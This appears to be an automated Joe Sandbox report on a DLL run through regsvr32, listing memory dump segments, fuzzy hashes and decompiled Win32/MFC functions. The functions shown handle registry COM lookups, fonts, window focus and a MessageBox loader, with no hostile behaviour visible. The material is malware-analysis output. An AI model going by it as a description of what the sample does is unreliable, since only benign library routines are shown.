Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$AtomCallGlobalProcPropRect$DeleteFindH_prologLongRemove
String ID: AfxOldWndProc423
API String ID: 2397448395-1060338832
Opcode ID: b34d00cbf6999e615bc280768e1467049727d477354bc8cfde06988ca96911aa
Instruction ID: a697b2d17b926414a4fd3a3f97edc9a0a2b9831967dac82f822b15042fcc5b8c
Opcode Fuzzy Hash: b34d00cbf6999e615bc280768e1467049727d477354bc8cfde06988ca96911aa
Instruction Fuzzy Hash: 09316B32A0011AABDB02DFA4CD89EEF7AB8FF45250F500129F601E21A1C73999119BA5

Uniqueness

Uniqueness Score: -1.00%

Function 100487EF Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 67
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100487EF(void* _a4, intOrPtr _a8) {
				void* _v8;
				void* _v12;
				int _v16;
				int _v20;
				void* __ebp;
				long _t28;
				char* _t30;
				long _t32;
				signed int _t37;
				void* _t47;

				_t37 = 0;
				_v12 = 0;
				if(RegOpenKeyA(0x80000000, "CLSID",  &_v12) == 0) {
					_v8 = 0;
					if(RegOpenKeyA(_v12, _a4,  &_v8) == 0) {
						_a4 = 0;
						_t28 = RegOpenKeyA(_v8, "InProcServer32",  &_a4);
						_t50 = _t28;
						if(_t28 == 0) {
							_t30 = E10045D4E(_a8, _t47, 0x104);
							_v16 = 0x104;
							_t32 = RegQueryValueExA(_a4, 0x10092d08, 0,  &_v20, _t30,  &_v16);
							E10045D9D(_a8, _t50, 0xffffffff);
							_t37 = 0 | _t32 == 0x00000000;
							RegCloseKey(_a4);
						}
						RegCloseKey(_v8);
					}
					RegCloseKey(_v12);
				}
				return _t37;
			}

0x10048801
0x1004880d
0x10048814
0x1004881b
0x1004882e
0x10048833
0x1004883f
0x10048841
0x10048843
0x1004884e
0x10048856
0x10048868
0x10048875
0x10048884
0x10048886
0x10048886
0x1004888b
0x1004888b
0x10048890
0x10048892
0x10048898

APIs

RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 10048810
RegOpenKeyA.ADVAPI32(?,?,00000001), ref: 10048824
RegOpenKeyA.ADVAPI32(00000001,InProcServer32,?), ref: 1004883F
RegQueryValueExA.ADVAPI32 ref: 10048868

Part of subcall function 10045D9D: lstrlenA.KERNEL32(?,?,10037008,000000FF), ref: 10045DB0

RegCloseKey.ADVAPI32(?), ref: 10048886
RegCloseKey.ADVAPI32(00000001), ref: 1004888B
RegCloseKey.ADVAPI32(?), ref: 10048890

Strings

InProcServer32, xrefs: 10048837
CLSID, xrefs: 10048803

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseOpen$QueryValuelstrlen
String ID: CLSID$InProcServer32
API String ID: 1568031711-323508013
Opcode ID: 9303173ab797fc2f5a775ec1c5c20bcdbbee3eb5c6a8c4a625b1d40e4af75117
Instruction ID: a315b3e0eb533767066366a02d0bc7c442b5d59d445c47da649338205a823ea7
Opcode Fuzzy Hash: 9303173ab797fc2f5a775ec1c5c20bcdbbee3eb5c6a8c4a625b1d40e4af75117
Instruction Fuzzy Hash: 2011F97690111CBBEB00EFA5CC84CDEBBA9EF44290B51457AF905E6250DB319E40DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10064078 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10064078() {
				int _t1;
				int _t7;
				struct HDC__* _t12;
				void* _t18;

				_t1 =  *0x1008fa60; // 0xffffffff
				if(_t1 == 0xffffffff) {
					_t12 = GetDC(0);
					_t18 = CreateFontA(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, "Marlett");
					if(_t18 != 0) {
						_t18 = SelectObject(_t12, _t18);
					}
					GetCharWidthA(_t12, 0x36, 0x36, 0x1008fa60);
					if(_t18 != 0) {
						SelectObject(_t12, _t18);
						DeleteObject(_t18);
					}
					ReleaseDC(0, _t12);
					_t7 =  *0x1008fa60; // 0xffffffff
					return _t7;
				}
				return _t1;
			}

0x10064078
0x10064080
0x100640a7
0x100640bc
0x100640c0
0x100640c6
0x100640c6
0x100640d2
0x100640da
0x100640de
0x100640e1
0x100640e1
0x100640e9
0x100640ef
0x00000000
0x100640f7
0x100640f8

APIs

GetDC.USER32(00000000), ref: 10064089
GetSystemMetrics.USER32 ref: 100640A9
CreateFontA.GDI32(00000000,?,10064206,?,?,10064253,?,?), ref: 100640B0
SelectObject.GDI32(00000000,00000000), ref: 100640C4
GetCharWidthA.GDI32(00000000,00000036,00000036,1008FA60), ref: 100640D2
SelectObject.GDI32(00000000,00000000), ref: 100640DE
DeleteObject.GDI32(00000000), ref: 100640E1
ReleaseDC.USER32(00000000,00000000), ref: 100640E9

Strings

Marlett, xrefs: 1006408F

Memory Dump Source

Source File: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
String ID: Marlett
API String ID: 1397664628-3688754224
Opcode ID: 64ea638c12b7fbd9a1025edc49e2886cfcc6d42a4d0238e5ec3d89febffce8b5
Instruction ID: b5b2f4e96ae48f53790442a1d49b147aa33d7fa124754b7757933789bb118500
Opcode Fuzzy Hash: 64ea638c12b7fbd9a1025edc49e2886cfcc6d42a4d0238e5ec3d89febffce8b5
Instruction Fuzzy Hash: 86018F72500674BBE23557768CCCDAB3E6DF7D7BA1B06460AF719A2190DA668D00C734

Uniqueness

Uniqueness Score: -1.00%

Function 10012762 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E10012762(intOrPtr __fp0, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12, signed char _a16) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct tagPOINT _v24;
				intOrPtr* _t61;
				intOrPtr* _t62;
				intOrPtr* _t66;
				signed char _t69;
				intOrPtr _t71;
				struct HDC__* _t78;
				intOrPtr _t83;

				_t83 = __fp0;
				_v8 = 0;
				_t78 = GetDC( *(_a4 - 0xa0));
				SetMapMode(_t78, 3);
				_t69 = _a16;
				_v24.x = 0;
				_v24.y = 0;
				if((_t69 & 0x00000004) == 0) {
					if((_t69 & 0x00000008) == 0) {
						goto L12;
					} else {
						_v16 = E1001C33C();
						_v12 = E1001C33C();
						DPtoLP(_t78,  &_v24, 2);
						if((_t69 & 0x00000002) == 0) {
							if((_t69 & 0x00000001) == 0) {
								goto L12;
							} else {
								_t61 = _a8;
								 *_t61 = _v16;
								_t71 = _v12;
								goto L11;
							}
						} else {
							_t61 = _a8;
							 *_t61 = _v16 - _v24.x;
							_t71 = _v24.y - _v12;
							L11:
							 *((intOrPtr*)(_t61 + 4)) = _t71;
						}
					}
				} else {
					_t62 = _a8;
					_v12 =  *((intOrPtr*)(_t62 + 4));
					_v16 =  *_t62;
					LPtoDP(_t78,  &_v24, 2);
					if((_t69 & 0x00000002) == 0) {
						if((_t69 & 0x00000001) == 0) {
							L12:
							_v8 = 0x80070057;
						} else {
							asm("fild dword [ebp-0xc]");
							_t66 = _a12;
							 *_t66 = __fp0;
							asm("fild dword [ebp-0x8]");
							goto L5;
						}
					} else {
						_a8 = _v16 - _v24.x;
						_t66 = _a12;
						asm("fild dword [ebp+0xc]");
						_a12 = _v24.y - _v12;
						 *_t66 = __fp0;
						asm("fild dword [ebp+0x10]");
						L5:
						 *((intOrPtr*)(_t66 + 4)) = _t83;
					}
				}
				ReleaseDC( *(_a4 - 0xa0), _t78);
				return _v8;
			}

0x10012762
0x10012776
0x1001277f
0x10012784
0x1001278a
0x1001278d
0x10012793
0x10012796
0x100127ef
0x00000000
0x100127f1
0x100127fe
0x10012806
0x10012810
0x10012819
0x10012831
0x00000000
0x10012833
0x10012833
0x10012839
0x1001283b
0x00000000
0x1001283b
0x1001281b
0x1001281e
0x10012824
0x10012829
0x1001283e
0x1001283e
0x1001283e
0x10012819
0x10012798
0x10012798
0x100127a2
0x100127aa
0x100127ad
0x100127b6
0x100127da
0x10012843
0x10012843
0x100127dc
0x100127dc
0x100127df
0x100127e2
0x100127e4
0x00000000
0x100127e4
0x100127b8
0x100127c4
0x100127c7
0x100127ca
0x100127cd
0x100127d0
0x100127d2
0x100127e7
0x100127e7
0x100127e7
0x100127b6
0x10012854
0x10012861

APIs

GetDC.USER32(?), ref: 10012779
SetMapMode.GDI32(00000000,00000003), ref: 10012784
LPtoDP.GDI32(00000000,?,00000002), ref: 100127AD
__ftol.LIBCMT ref: 100127F6
__ftol.LIBCMT ref: 10012801
DPtoLP.GDI32(00000000,?,00000002), ref: 10012810
ReleaseDC.USER32(?,00000000), ref: 10012854

Strings

W, xrefs: 10012843

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: __ftol$ModeRelease
String ID: W
API String ID: 1379597261-655174618
Opcode ID: 88a2fe803e998b3d4457426704304d6283604f1e0fb58712043199ed3eacc4c6
Instruction ID: 82740af4db08876406e5a16a967b32f8f1156a4d1cc98e773919b5dd31416d48
Opcode Fuzzy Hash: 88a2fe803e998b3d4457426704304d6283604f1e0fb58712043199ed3eacc4c6
Instruction Fuzzy Hash: B24119B5A01249EFDB05DF98C999BAEBBB4FF44740F11809AE855AB390C730DA60CF50

Uniqueness

Uniqueness Score: -1.00%

Function 10043DC8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 68
windowCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E10043DC8(void* __ebx, void* __ecx, signed int _a4, long _a8) {
				struct HWND__* _v8;
				void* __ebp;
				void* _t14;
				void* _t17;
				void* _t18;
				void* _t28;
				struct HWND__* _t29;
				signed int _t33;
				void* _t36;
				void* _t40;
				void* _t43;

				_t28 = __ebx;
				_push(__ecx);
				_t36 = __ecx;
				_t40 = E100436AB(__ecx);
				_t33 = _a4 & 0x0000fff0;
				_t14 = _t33 - 0xf040;
				if(_t14 == 0) {
					L12:
					if(_a8 != 0x75 || _t40 == 0) {
						L15:
						goto L16;
					} else {
						E10045522(_t40);
						L11:
						_push(1);
						_pop(0);
						L16:
						return 0;
					}
				}
				_t17 = _t14 - 0x10;
				if(_t17 == 0) {
					goto L12;
				}
				_t18 = _t17 - 0x10;
				if(_t18 == 0 || _t18 == 0xa0) {
					if(_t33 == 0xf060 || _a8 != 0) {
						if(_t40 != 0) {
							_push(_t28);
							_t29 =  *(_t36 + 0x1c);
							_v8 = GetFocus();
							E10041F78(_t43, SetActiveWindow( *(_t40 + 0x1c)));
							SendMessageA( *(_t40 + 0x1c), 0x112, _a4, _a8);
							if(IsWindow(_t29) != 0) {
								SetActiveWindow(_t29);
							}
							if(IsWindow(_v8) != 0) {
								SetFocus(_v8);
							}
						}
					}
					goto L11;
				} else {
					goto L15;
				}
			}

0x10043dc8
0x10043dcb
0x10043dce
0x10043dd8
0x10043dda
0x10043de2
0x10043de7
0x10043e6e
0x10043e73
0x10043e82
0x00000000
0x10043e79
0x10043e7b
0x10043e69
0x10043e69
0x10043e6b
0x10043e84
0x10043e87
0x10043e87
0x10043e73
0x10043ded
0x10043df0
0x00000000
0x00000000
0x10043df2
0x10043df5
0x10043e08
0x10043e12
0x10043e14
0x10043e15
0x10043e27
0x10043e2d
0x10043e40
0x10043e51
0x10043e54
0x10043e54
0x10043e5e
0x10043e63
0x10043e63
0x10043e5e
0x10043e12
0x00000000
0x00000000
0x00000000
0x00000000

APIs

GetFocus.USER32 ref: 10043E18
SetActiveWindow.USER32(?), ref: 10043E2A
SendMessageA.USER32 ref: 10043E40
IsWindow.USER32(?), ref: 10043E4D
SetActiveWindow.USER32(?), ref: 10043E54
IsWindow.USER32(?), ref: 10043E59
SetFocus.USER32 ref: 10043E63

Strings

u, xrefs: 10043E6E

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$ActiveFocus$MessageSend
String ID: u
API String ID: 1556911595-4067256894
Opcode ID: 0728a3af53684335c76fe1ec53df87108aeef01552590a34cd54db021c6eefc2
Instruction ID: 2b3ef4e7be8c08a327436051fe1285ff777d60550a4a4b361984bc190e02fe43
Opcode Fuzzy Hash: 0728a3af53684335c76fe1ec53df87108aeef01552590a34cd54db021c6eefc2
Instruction Fuzzy Hash: F311D332902216AAEB259F7ACD4599E3BE4EB44390F21D435FA02D21E1C635DE009B94

Uniqueness

Uniqueness Score: -1.00%

Function 10047399 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10047399(intOrPtr __ecx, short _a4) {
				intOrPtr _v8;
				char _v40;
				void _v68;
				void* _t11;
				signed int _t15;
				int _t20;
				char* _t24;
				struct HDC__* _t26;

				_v8 = __ecx;
				_t20 = 0xa;
				_t24 = "System";
				_t11 = GetStockObject(0x11);
				if(_t11 != 0) {
					L2:
					if(GetObjectA(_t11, 0x3c,  &_v68) != 0) {
						_t24 =  &_v40;
						_t26 = GetDC(0);
						_t15 = _v68;
						if(_t15 < 0) {
							_v68 =  ~_t15;
						}
						_t20 = MulDiv(_v68, 0x48, GetDeviceCaps(_t26, 0x5a));
						ReleaseDC(0, _t26);
					}
					L6:
					if(_a4 == 0) {
						_a4 = _t20;
					}
					return E1004727F(_v8, _t24, _a4);
				}
				_t11 = GetStockObject(0xd);
				if(_t11 == 0) {
					goto L6;
				}
				goto L2;
			}

0x100473aa
0x100473ad
0x100473ae
0x100473b5
0x100473b9
0x100473c3
0x100473d2
0x100473d6
0x100473df
0x100473e1
0x100473e6
0x100473ea
0x100473ea
0x10047405
0x10047407
0x10047407
0x1004740d
0x10047412
0x10047414
0x10047414
0x10047427
0x10047427
0x100473bd
0x100473c1
0x00000000
0x00000000
0x00000000

APIs

GetStockObject.GDI32(00000011), ref: 100473B5
GetStockObject.GDI32(0000000D), ref: 100473BD
GetObjectA.GDI32(00000000,0000003C,?), ref: 100473CA
GetDC.USER32(00000000), ref: 100473D9
GetDeviceCaps.GDI32(00000000,0000005A), ref: 100473F0
MulDiv.KERNEL32 ref: 100473FC
ReleaseDC.USER32(00000000,00000000), ref: 10047407

Strings

System, xrefs: 100473AE, 1004741D

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: eedbfeb26c641122faa9dd6b20b5eba03c076413296c3fdf73d6919b21f92d53
Instruction ID: b6c642d8df7586aa910bf431430daae2b5b350eda1e0e71699dd10ca38cd87e7
Opcode Fuzzy Hash: eedbfeb26c641122faa9dd6b20b5eba03c076413296c3fdf73d6919b21f92d53
Instruction Fuzzy Hash: 40117331600319EFFB059BA4CC49FAE3BB8FB44781F504026FA09E6180D7B19E01CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 10026CBC Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 46%

			E10026CBC(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr* _t4;
				intOrPtr* _t7;
				_Unknown_base(*)()* _t11;
				void* _t14;
				struct HINSTANCE__* _t15;

				_t14 = 0;
				if( *0x100952b0 != 0) {
					L4:
					_t4 =  *0x100952b4;
					if(_t4 != 0) {
						_t14 =  *_t4();
						if(_t14 != 0) {
							_t7 =  *0x100952b8;
							if(_t7 != 0) {
								_t14 =  *_t7(_t14);
							}
						}
					}
					return  *0x100952b0(_t14, _a4, _a8, _a12);
				}
				_t15 = LoadLibraryA("user32.dll");
				if(_t15 == 0) {
					L10:
					return 0;
				}
				_t11 = GetProcAddress(_t15, "MessageBoxA");
				 *0x100952b0 = _t11;
				if(_t11 == 0) {
					goto L10;
				} else {
					 *0x100952b4 = GetProcAddress(_t15, "GetActiveWindow");
					 *0x100952b8 = GetProcAddress(_t15, "GetLastActivePopup");
					goto L4;
				}
			}

0x10026cbd
0x10026cc7
0x10026d0b
0x10026d0b
0x10026d12
0x10026d16
0x10026d1a
0x10026d1c
0x10026d23
0x10026d28
0x10026d28
0x10026d23
0x10026d1a
0x00000000
0x10026d37
0x10026cd4
0x10026cd8
0x10026d41
0x00000000
0x10026d41
0x10026ce6
0x10026cea
0x10026cef
0x00000000
0x10026cf1
0x10026cff
0x10026d06
0x00000000
0x10026d06

APIs

LoadLibraryA.KERNEL32(user32.dll), ref: 10026CCE
GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 10026CE6
GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 10026CF7
GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 10026D04

Strings

user32.dll, xrefs: 10026CC9
GetLastActivePopup, xrefs: 10026CF9
GetActiveWindow, xrefs: 10026CF1
MessageBoxA, xrefs: 10026CE0

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
